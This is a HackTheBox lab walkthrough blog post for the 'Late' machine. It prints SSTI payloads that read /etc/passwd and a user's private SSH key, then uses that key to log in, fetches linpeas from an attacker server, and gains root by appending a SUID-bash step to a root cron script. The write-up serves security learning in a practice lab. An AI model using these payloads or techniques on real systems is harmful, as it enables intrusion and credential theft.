Late HackTheBox Walkthrough

Summary

Late is Linux machine and considered as easy box by the hack the box. On this box we will begin with basic port scan and move laterally based on findings. Then we will enumerate HTTP service and hunt vulnerabilities present in the web page.  Laterally, we will exploit server-side template injection (SSTI) vulnerability to gain an initial foothold into the target system. Then we will be tasked to gain root access where we will exploit it by abusing file ownership and  cron job.

Table of content

Initial Access

  • Nmap TCP Port Scan
  • Web Page Enumeration
  • Vulnerability Assessment
  • Server-Side Template Injection Exploitation
  • User Flag

Privilege Escalation

  • Find Privilege Escalation Vectors
  • Escalate Privilege via owned file set to cron job
  • Root Flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the normal TCP/IP port scanning.

 

Nmap TCP Port Scan

We begin with the port scan where we are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. To perform port scan, we have used -sV flag which performs a service version against the target machine.

Flags features:

-sV   :  Attempts to determine the service version

 

nmap -sV 10.129.227.134

From the nmap scan, we have found there were only two ports open, which is port 22 and port 80. As usual HTTP service is running on port 80 and SSH service is running on port 22.  HTTP service is used for the webhosting where SSH service is used for remote connection. We did not find any vulnerabilities on SSH version 7.6p1 and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Instead of thinking about the SSH bruteforce let’s start enumerating port 80.

 



 

Web Page Enumeration

We enumerate port 80 and accessing it over the bowser shown an Image related website. Nothing looks interesting here in the web page, we saw a heading “Worlds Simplest Image Utilities” that works for graphics and title “late” which can be a potential domain name.

 



Then we checked source code of the web page as many times we find sensitive information in the comment section and URLs. There we found a domain name http://images.late.htb/.



Next, we added the domain name into the /etc/hosts file in our attacking machine to enumerate further about Domain. You can use any text editor to add domain to hosts file.



 

Vulnerability Assessment

After adding it into the hosts file, we accessed http://image.late.htb over browser and we got a new web page where we can upload images. After analysing the functionalities of the web page, we found that web page converts any image into text format. For example, if we have any text on image then it will convert it to text format.

 



Then we decided to check how it functions and also created a Server-Side Template Injection (SSTI) payload and saved it as payload.png which makes sense as it converts images to text. We can write a payload using text editor and take a screenshot and save it as png format as well.

{{7*7}}



After creating our payload, we uploaded it into the web page. You can click on browse tab and upload it from the directory you have kept our payload.png file. We can see Convertio CMS is being used to convert image file to text files. Convertio is popular open-sourced image to text convertor.

 



Once we convert our file, we can download it by clicking on download tab and it will be saved as results.txt in our download’s directory. After downloading the file, we checked the result and found that Convertio is vulnerable to Server-Side Template Injection (SSTI). If we get the sum of the given argument, then it is quite promising that server is vulnerable to SSTI. For example, we have given {{7*7}}in our payload and received 49 as sum of 7*7.

 A server-side template injection (SSTI) vulnerability occurs when user data is embedded directly in a template and then interpreted by the template engine. This allows attackers to inject arbitrary directives to manipulate the template engine.



Then we decided to check the users in the target system. The user file is available in the /etc/passwd file. SSTI works similar as Local File inclusion vulnerability, but it has different syntax which is available here:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

We created a new payload to read /etc/passwd file from the target system and repeated the same process.

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}



Then we uploaded it and converted it to text format as we did earlier.



This time we got /etc/passwd file contents of the target system. After having a closer look into the passwd file, we found a user svc_acc present there. Now, we can perform couple of attacks against the target such as SSH service bruteforce or retrieving id_rsa file from the target host. When SSH bruteforce failed, we decided to retrieve the id_rsa file from the user .ssh directory.



Server-Side Template Injection (SSTI) Exploitation

The id_rsa file is in the /home/svc_acc/.ssh directory named as id_rsa. With id_rsa private key we can log in as svc_acc user without password if the id_rsa key is not protected with password. Then we created another payload where we have given the file path of the id_rsa and saved it as payload.png.

{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }}



When we upload our new payload, it will read the contents of id_rsa key and save it as results.txt file. We retrieved the RSA key downloading converted file. Now, we have RSA key, so we are in the position try log in via SSH service with retrieved RSA key.


User Flag

We saved RSA key as key and given 600 file permission. RSA key works with 600 and 400 file permission. If we do not give permission, then it will throw some errors to establish connection with the remote host. 600 permissions means that only the owner of the file has full read and write access to it. Once a file permission is set to 600, no one else can access the file. We can give permission to file by chmod 600 <filename>.

chmod 600 key

Then we can log in to the target system using RSA key as svc_acc. As we are going to establishing connection to the target host, we must add -i and pass RSA key to authenticate.

ssh -i key svc_acc@10.129.227.134

After logging in to the target system we can grab user flag from the svc_acc home directory.

cat user.txt

Next, we need to escalate to privilege account, so we transferred linpeas.sh script to the target system /tmp directory as any user has full permission on this directory. To transfer linpeas.sh into the target system we have to setup a python server in kali machine. Here we have set up python server on port 80, now we can download script with wget from target side.

In Kali:

python3 -m http.server 80

On Target:

wget 10.10.14.31/linpeas.sh 

Once it is downloaded in the target system, we will give full permission to the linpeas.sh and execute it. Script will enumerate possible privilege escalation vectors present in the target system.

chmod  777 linpeas.sh

./linpeas.sh



Privilege Escalation

Privilege escalation is the process of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Privilege escalation can be used by attackers to gain access to more system functions and data than intended by the root user. In some cases, privilege escalation can allow attackers to gain complete control of the system.

Find Privilege Escalation Vectors

After reviewing the linpeas.sh output, we found that the current user has an ownership permission on the ssh-alrert.sh script. We can perform various attacks if the file is writable by low privileged user and owned by root user. Before coming into any conclusion, lets enumerate what script does.



Escalate Privilege via owned file set to cron job

The script must be running as cron job, that means it is automated to perform some tasks on events or set for some jobs.  For example, when someone try to log in via SSH then it will send an alert to root user. We have ownership of the script but unfortunately, we cannot modify it.



Root Flag

Being an owner of the script, we can append anything on the script, which means we cannot delete or modify existing contents, but we have privilege to add more in it. So, if script executed by root next time it will also execute the task we have added.

Let’s append /bin/bash binary and give SUID permission. Now if we log in via SSH service then it will create a bin/bash binary in svc_acc home directory with SUID set. If we execute it, then it will spawn a root shell. Once we get root shell then we can grab root flag from /root/root directory.


Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, service enumeration, Server-Side Template Injection vulnerability assessment and exploitation, file transfer, file permissions, cron script analysis and performed privilege escalation by exploiting file permission and cron job.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

 

0 comments:

Post a Comment